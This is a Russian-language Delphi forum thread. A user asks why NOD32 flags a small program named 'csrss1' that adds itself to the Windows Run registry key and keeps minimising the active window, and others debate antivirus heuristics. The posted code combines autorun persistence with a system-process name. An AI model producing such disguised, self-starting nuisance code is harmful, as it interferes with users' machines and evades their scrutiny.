почему если убираешь строки про реестр nod32 ругается

← →
Jonis_84 © (2012-08-11 03:03) [0]

program csrss1; uses Winapi.Windows, Winapi.Messages, Vcl.Forms, Registry ; var des,h:HWnd; Reg:TRegistry; opa:TPoint; Rec:TRect; begin reg := TRegistry.Create();//? reg.RootKey := HKEY_CURRENT_USER;//? if reg.OpenKey("Software\Microsoft\Windows\CurrentVersion\Run", True) then//? begin reg.WriteString( Application.Title, Application.ExeName);//? reg.CloseKey();//? end;//? while True do begin des:=GetForegroundWindow; ShowWindow(Des,SW_MINIMIZE); sleep(3000);

Если убрать добавление записи в реестр Nod шлёт погу в карантин???строчки ему нравятся)))хорошего для системы кажется в них ничего нет)
reg := TRegistry.Create();//? reg.RootKey := HKEY_CURRENT_USER;//? if reg.OpenKey("Software\Microsoft\Windows\CurrentVersion\Run", True) then//? begin reg.WriteString( Application.Title, Application.ExeName);//? reg.CloseKey();//? end;//?
Спасибо!!!

← →
Германн © (2012-08-11 03:18) [1]

Все вопросы к индусам.

← →
Anatoly Podgoretsky © (2012-08-11 06:26) [2]

> Jonis_84 (11.08.2012 03:03:00) [0]

nod32 много о себе думает.

← →
Rouse_ © (2012-08-11 11:06) [3]

Ложное срабатывание, отправь экзешник с кодом в саппорт нода.

← →
Eraser © (2012-08-12 01:58) [4]

> Jonis_84 © (11.08.12 03:03)

и правильно срабатывает.
вот ты зачем назвал экзешник csrss1? просто буковки понравились?

← →
Германн © (2012-08-12 02:33) [5]

>
> > Jonis_84 © (11.08.12 03:03)
>
> и правильно срабатывает.
> вот ты зачем назвал экзешник csrss1? просто буковки понравились?
>

А вот этого я и не заметил! Ну есс-но любой антивирусник должен возбудиться на такое имя. Так что "ложное срабатывание" похоже можно дезавуировать.

← →
brother © (2012-08-12 11:12) [6]

трояновирусописаки вон!

← →
Rouse_ © (2012-08-12 12:31) [7]

> Ну есс-но любой антивирусник должен возбудиться на такое
> имя.

В топку такие антивирусники, которые вирусы на основании имени детектируют :)

← →
wl © (2012-08-12 12:41) [8]

> Rouse_ © (12.08.12 12:31) [7]

называется как вирус, действует как вирус, и что - "Не верь глазам своим"(с)

← →
Rouse_ © (2012-08-12 12:46) [9]

> называется как вирус

ненаказуемо ©
вирусы часто называются setup.exe

> действует как вирус

запись в авторан и минимизация текущего активного окна, это вирус? :)
Какие-то безобидные нынче вирусы пошли, или у нас разные понятия о их природе и поведении ;)

← →
QAZ (2012-08-12 15:35) [10]

если уж на то пошло, то вирус это програма внедряющая свой код в другую программу, все остальное это не вирус, чем бы оно не занималось

← →
wl © (2012-08-12 21:20) [11]

да, простите, излишне обобщил все вредоносное по одним словом

← →
Германн © (2012-08-13 02:54) [12]

> Rouse_ © (12.08.12 12:31) [7]
>
>
> > Ну есс-но любой антивирусник должен возбудиться на такое
> > имя.
>
> В топку такие антивирусники, которые вирусы на основании
> имени детектируют :)
>

Это называется "перестраховка". И не надо сразу её фтопку! :)
В топике может быть представлено что угодно. В реальной ситуации может быть нечто иное.

← →
Eraser © (2012-08-13 04:38) [13]

Кстати, автор не упомянул, включена ли защита от потенциально опасного ПО, скорее всего включена.

← →
Rouse_ © (2012-08-13 14:11) [14]

> Это называется "перестраховка"

Это называется идиотизм, если выставялется приговор на основе имени приложения. Я понимаю если бы эвристик обработал или сигнатурный поиск.

← →
Anatoly Podgoretsky © (2012-08-13 14:26) [15]

> Rouse_ (13.08.2012 14:11:14) [14]

На основе имени, приводит к тому что не остается незаблокированых файлов

← →
Eraser © (2012-08-13 15:53) [16]

> Rouse_ © (13.08.12 14:11) [14]

это и есть эвристик практически в чистом виде.

← →
Rouse_ © (2012-08-13 16:12) [17]

> это и есть эвристик практически в чистом виде.

Т.е. ты серьезно считаешь что в наименовании файла таится некая скрытая угроза на которую должен реагировать эвристик?
Я вот почему-то считал всегда что он должен принимать решение на результатах поведенческого анализа, полученного после рапаковки, дизассемблирования тела анализируемого приложения и построения вероятностных графов логики на основе статического анализа и/или логирования выполняемых действий в сэндбоксе :)

← →
Rouse_ © (2012-08-13 16:15) [18]

Ну а по поводу фтопку я уже говорил, не антивируса собачье дело как у меня исполняемый файл называется, хоть csrss, хоть supervirus - ему это должно быть до балды, он должен принимать решения базирующиеся не на ламерских постулатах, а на основе анализа тела файла ;)

← →
Anatoly Podgoretsky © (2012-08-13 16:28) [19]

Антивирус недолжен так поступать, а вот дефендер может (crack.exe/keygen.exe), и никакого карантина, а прямой запрос на операцию - удалить/разрешить/карантин/в исключения.

← →
Rouse_ © (2012-08-13 19:28) [20]

> а вот дефендер может

Дефендер (шоп его приподняло) у меня экзешники без запроса в карантин отправлял. Когда списались с их техническими писаками выяснилось что он так на название последней секции реагировал (там было что-то типа .morfin). Правда это было еще на заре дефендера...

← →
Anatoly Podgoretsky © (2012-08-13 20:02) [21]

> Rouse_ (13.08.2012 19:28:20) [20]

Ну сейчас дефендера как такого убили, включив его в состав антивируса, и так
у многих производителей.
У меня несколько раз срабатывал, но советовался со мной.

← →
Dennis I. Komarov © (2012-08-13 20:30) [22]

> Я вот почему-то считал всегда что он должен принимать решение
> на результатах поведенческого анализа, полученного после
> рапаковки, дизассемблирования тела анализируемого приложения
> и построения вероятностных графов логики на основе статического
> анализа и/или логирования выполняемых действий в сэндбоксе
> :)

Стал ругаться на некую конструкцию if then else... (ну поведение может и было подозрительно - там файлы переименовывались)
Поменял на if then; if not then - не кашерно, но антитварь орать перестала...

> Стал ругаться на некую конструкцию if then else

Это сигнатурный анализ - стандартно :)

← →
Давайте будем жрать! (2012-08-13 20:52) [24]

а название у программки показательное, ага... ещё б антивирь не хватался за киндьжялъ на каждое хоть сколько-то подозрительное действие.

> Rouse_ © (13.08.12 16:12) [17]

эвристика, это то, что выявляется опытным путем, в т.ч. на основе статистики. если 99 программ из 100 с подобным названием и с обращением к этому же ключу реестра являются вредоносными, то закономерно отнести все такие программы к вредоносным.

> Eraser © (14.08.12 20:48) [25]
>
> > Rouse_ © (13.08.12 16:12) [17]
>
> эвристика, это то, что выявляется опытным путем, в т.ч.
> на основе статистики. если 99 программ из 100 с подобным
> названием и с обращением к этому же ключу реестра являются
> вредоносными, то закономерно отнести все такие программы
> к вредоносным.

Это ты сам придумал? Сие есть статистика, а не эвристика ;)
Я же выше озвучил что большинство зловредов идет под наименованием setup.exe, сетаперы убивать будем прямо с ходу?
Ну и советую хотя-бы почитать технические статьи по реализации эвристических анализаторов. Неплохо до кучи будет изучить утекшие в сеть исходники касперского и AVZ, особенное AVZ - там очень красиво показана вообще реализация детекта на поведенческом анализе.

> [25] Eraser © (14.08.12 20:48)
> эвристика, это то, что выявляется опытным путем, в т.ч.
> на основе статистики.

Это эмпирическое.

> Rouse_ © (14.08.12 20:55) [26]

а что со мной то спорить? ) это с производителями антивирусов спорь.
я ни сколько не фанат такого подхода, наш продукт регулярно попадает под раздачу таких вот эвристик. по шапке и от есета и от каспера получаем регулярно, несмотря на наличие ЭЦП, кстати.

> Eraser © (14.08.12 21:06) [28]
> а что со мной то спорить? ) это с производителями антивирусов
> спорь.

Леш, да брось - я не спорю, я просто указываю на немного неверную трактовку некоторых понятий :)

> наш продукт регулярно попадает под раздачу таких вот эвристик.
> по шапке и от есета и от каспера получаем регулярно, несмотря
> на наличие ЭЦП, кстати.

А вот это достаточно уже серьезно, мы такое прошли года 4 назад приложив некоторое кол-во усилий. Т.е. прямой контакт с разрабами и выявление конкретной причины. У нас были траблы как с антивирусами так и с Wine эмулятором. Как правило, когда пройдешь через решето манагеров и выйдешь напрямую на разработчиков - все проблемы решаются в день-два.

> Rouse_ © (14.08.12 21:17) [29]

> А вот это достаточно уже серьезно, мы такое прошли года
> 4 назад приложив некоторое кол-во усилий. Т.е. прямой контакт
> с разрабами и выявление конкретной причины. У нас были траблы
> как с антивирусами так и с Wine эмулятором. Как правило,
> когда пройдешь через решето манагеров и выйдешь напрямую
> на разработчиков - все проблемы решаются в день-два.

Дело в том, что в нашем случае это вряд ли спасет. Да и убирают срабатывание из базы обычно довольно оперативно (или наоборот добавляют в базу исключение, не знаю уж как там у них).

А срабатывает не из-за каких-то хитрых конструкций, шифрования кода, защиты от взлома и прочих writeprocessmemory. а по вполне формальным признакам. Т.к. ПО для удаленного администрирования итак относится к потенциально опасному. То за кейлогер примут, то за троян. Из-за каких особенностей ПО принимают за вредоносное - вполне понятно, но поделать с этим ничего нельзя увы, это часть функционала.

> ПО для удаленного администрирования итак относится к потенциально
> опасному.

Дык у нас полноценный админкит присутствует, работающий примерно как у тебя на сайте в профиле. Сработались все-же :)

почему если убираешь строки про реестр nod32 ругается Найти похожие ветки